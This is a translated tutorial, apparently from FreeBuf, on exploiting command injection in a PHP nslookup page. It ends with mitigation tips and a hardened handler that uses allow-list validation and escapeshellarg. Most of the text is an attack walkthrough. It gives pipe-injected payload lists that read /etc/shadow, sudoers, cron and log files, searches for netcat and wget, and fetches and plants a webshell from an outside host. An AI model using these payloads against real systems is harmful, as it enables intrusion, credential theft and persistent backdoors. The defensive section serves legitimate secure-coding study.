Now let's take a look:
This is a web interface for querying DNS: you enter an IP address or a host name in the input box and submit the query.
The implementation is not complex, as shown below:
<?php
if (isset($_POST["dns-lookup-php-submit-button"])) {
    try {
        if ($targethost_validated) {
            // The user-supplied host is concatenated into the shell command as-is.
            echo shell_exec("nslookup " . $targethost);
            $LogHandler->writeToLog($conn, "Executed operating system command: nslookup " . $lTargetHostText);
        } else {
            echo '<script>document.getElementById("id-bad-cred-tr").style.display=""</script>';
        } // end if ($targethost_validated)
    } catch (Exception $e) {
        echo $CustomErrorHandler->FormatError($e, "Input: " . $targethost);
    } // end try
} // end if (isset($_POST))
?>
Now, we try to query the IP address 74.125.31.102.
Did you notice the shell_exec() function in the code above?
Now you should understand how this query interface is implemented: the input is passed straight to the system through shell_exec("nslookup " . $targethost), so executing system commands through it is very easy.
Next, we will try to inject malicious code.
In Linux, "&" can be used to chain commands, and ";" is the command separator.
Now we will make some attempts with the echo command. I personally prefer to use "|" instead of "&"; the specific reason is described below.
| echo 'hello': the above input is actually executed in the same way as nslookup | echo 'hello' in the terminal.
Why do I use the pipe operator "|" instead? It will be explained to you.
Next we try to get more server information. Because we ran uname -a before, we can already identify the system: Linux kernel release 3.0.0-1, host name projectX, operating system GNU/Linux... Let's check which Linux distribution is used:
| cat /etc/issue
| cat /etc/*-release
| cat /etc/lsb-release
| cat /etc/redhat-release
Ha, this is BackBox, which is my favorite Linux distribution. :) Let's see which directory we are in:
| pwd; ls -la
To collect more information, we need to check the services running on the server.
| ps aux
| ps -ef
| top
| cat /etc/service
To go further and discover vulnerabilities in the system (for example, something an exploit could be used against), the following commands may be useful:
| cat /etc/environment
| cat /proc/self/environ
| cat /etc/shadow
| cat /etc/sudoers
| cat /etc/group
| cat /etc/security/group
| cat /etc/security/passwd
| cat /etc/security/user
| cat /etc/security/environ
| cat /etc/security/limits
| cat /usr/lib/security/mkuser.default
| cat /var/log/messages
| cat /var/log/mysql.log
| cat /var/log/user.log
| cat /var/www/logs/error_log
| cat /etc/syslog.conf
| cat /etc/chttp.conf
| cat /etc/lighttpd.conf
| cat /etc/cups/cupsd.conf
| cat /etc/inetd.conf
| cat /etc/apache2/apache2.conf
| cat /var/log/apache2/error.log
| cat /etc/my.conf
| cat /etc/httpd/conf/httpd.conf
| cat /opt/lampp/etc/httpd.conf
| ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
| cat /etc/resolv.conf
| cat /etc/sysconfig/network
| cat /etc/networks
| /sbin/ifconfig -
| cat /etc/network/interfaces
| ls -alh /var/spool/cron
| ls -al /etc/ | grep cron
| ls -al /etc/cron*
| cat /etc/cron*
| cat /etc/at.allow
| cat /etc/at.deny
| cat /etc/cron.allow
| cat /etc/cron.deny
| cat /etc/crontab
| cat /etc/anacrontab
| cat /var/spool/cron/crontabs/root
Many attackers like to leave a backdoor on a Linux server, so they need to find out which tools are available for uploading files:
| find / -name wget
| find / -name nc*
| find / -name netcat*
| find / -name tftp*
| find / -name ftp
Use wget to fetch a txt file:
| wget http://freebuf.com/thanks/unixhck.txt
Succeeded.
Well, in that case, the natural next step is to wget a webshell.
| wget http://freebuf.com/backdoor.txt
Rename it:
| cp backdoor.txt backdoor.php
View our shell.
Several tips to prevent remote code execution:
1. Disable the shell_exec() function.
2. If you really need to use shell_exec(), we recommend filtering the input with escapeshellarg() and escapeshellcmd().
3. Use a WAF or the mod_security module for interception and filtering.
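As an added example that is not part of the original post, here is a hardened version of the lookup handler applying tip 2 properly: the input is accepted only if it is an IP address or a syntactically valid host name, and the accepted value is then passed through escapeshellarg() so the shell receives exactly one argument. Rejected inputs containing shell metacharacters are logged so that injection attempts show up in the error log. The form field name target_host, the helper function names and the log message are assumptions; the submit-button name and the error-row id are taken from the page's snippet.

```php
<?php
// Added example (not the original page's code): a hardened replacement for the
// lookup handler. Two layers: (1) strict allow-list validation of the input as
// an IPv4/IPv6 address or DNS host name, (2) escapeshellarg() so that whatever
// reaches the shell is a single quoted argument.

/**
 * True only if $host is an IP address or a syntactically valid host name.
 * Shell metacharacters such as | ; & ` $ ( ) never pass this check, and a
 * leading "-" is refused so the value cannot become an nslookup option.
 */
function is_valid_lookup_target(string $host): bool
{
    if ($host === '' || strlen($host) > 253) {
        return false;
    }
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    // RFC 1123 style host name: dot-separated labels of letters, digits and
    // hyphens, 1-63 characters each, not starting or ending with a hyphen.
    return (bool) preg_match(
        '/^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$/',
        $host
    );
}

/**
 * Build the nslookup command line, or return null when the input is rejected.
 * escapeshellarg() wraps the value in single quotes and escapes embedded
 * quotes, so the shell sees one argument regardless of its content.
 */
function build_nslookup_command(string $host): ?string
{
    if (!is_valid_lookup_target($host)) {
        return null;
    }
    return 'nslookup ' . escapeshellarg($host);
}

/**
 * Detection helper: does the raw input contain characters that only make sense
 * as an attempt to break out of the intended argument? Used for logging.
 */
function looks_like_injection_attempt(string $input): bool
{
    return (bool) preg_match('/[|;&`$()<>\r\n]/', $input);
}

// Handler wired the same way as the page's snippet.
if (isset($_POST['dns-lookup-php-submit-button'])) {
    $targethost = (string) ($_POST['target_host'] ?? '');   // assumed field name
    $cmd = build_nslookup_command($targethost);
    if ($cmd === null) {
        if (looks_like_injection_attempt($targethost)) {
            // hex-encode so the log line itself cannot carry control characters
            error_log('Rejected DNS lookup input with shell metacharacters: ' . bin2hex($targethost));
        }
        echo '<script>document.getElementById("id-bad-cred-tr").style.display=""</script>';
    } else {
        // Output encoding keeps nslookup's text from being rendered as HTML.
        echo htmlspecialchars((string) shell_exec($cmd), ENT_QUOTES, 'UTF-8');
    }
}
```

Two points worth keeping in mind when applying the tips. For tip 1, shell_exec() is switched off in php.ini with disable_functions (listing exec, system, passthru, popen and proc_open alongside it, since any of them reaches a shell). For tip 2, escapeshellarg() is the one that protects a single value; escapeshellcmd() escapes metacharacters across a whole command string but does not quote spaces, so a value can still add extra arguments to the command. Validation against an allow-list, as above, is what makes the input safe; the escaping is the second line of defence.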
From FreeBuf.com